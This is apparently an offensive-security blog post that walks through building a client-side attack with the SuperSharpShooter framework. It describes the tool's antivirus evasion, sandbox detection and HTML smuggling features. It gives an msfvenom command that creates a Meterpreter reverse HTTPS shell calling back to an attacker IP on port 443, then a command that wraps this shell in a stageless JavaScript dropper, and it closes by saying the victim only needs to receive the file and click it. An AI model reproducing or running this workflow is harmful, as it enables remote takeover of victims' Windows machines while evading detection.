This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers.
Running Shell Code in C#
Over the last few weeks, we have been building payloads and droppers manually and in some cases downloading entire library's to get a reverse shell. This week we are going to put our feet up and take things a little easier. Enter SuperSharpShooter a script that you can get here from GitHub:
https://github.com/SYANiDE-/SuperSharpShooter
This tool has been based off the original SharpShooter script from MDsec but with some minor changes.
The Author describes the tool as a "payload creation framework for the retrieval and execution of arbitrary CSharp source code. SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS and WSF. It leverages James Forshaw's DotNetToJavaScript tool to invoke methods from the SharpShooter DotNet serialised object. "
Payloads can be retrieved using Web or DNS delivery or both; SharpShooter is compatible with the MDSec ActiveBreach PowerDNS project. Alternatively, stageless payloads with embedded shellcode execution can also be generated for the same scripting formats.
SharpShooter payloads are RC4 encrypted with a random key to provide some modest anti-virus evasion, and the project includes the capability to integrate sandbox detection and environment keying to assist in evading detection.
SharpShooter includes a predefined CSharp template for executing shellcode with staged and stageless payloads, but any CSharp code can be compiled and invoked in memory using reflection, courtesy of CSharp's CodeDom provider.
Finally, SharpShooter provides the ability to bundle the payload inside an HTML file using the Demiguise HTML smuggling technique.
SharpShooter targets v2, v3 and v4 of the .NET framework which will be found on most end-user Windows workstations.
The Payload
The fist step is to create the payload using msfvenom for the reverse shell stager over https on 443 but saving it locally as a text file, that is to be used by the SuperSharpShooter Script in the next step.
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.49.60 LPORT=443 -f raw -o /var/www/html/shell.txtCode Example
Once the payload has been created the next phase is to run the SharpShooter script using the location of the output of the raw output file for the payload.
python3 SuperSharpShooter.py --payload js --dotnetver 4 --stageless --rawscfile /var/www/html/shell.txt --output testOnce this has been created we just need the victim to receive the file and click.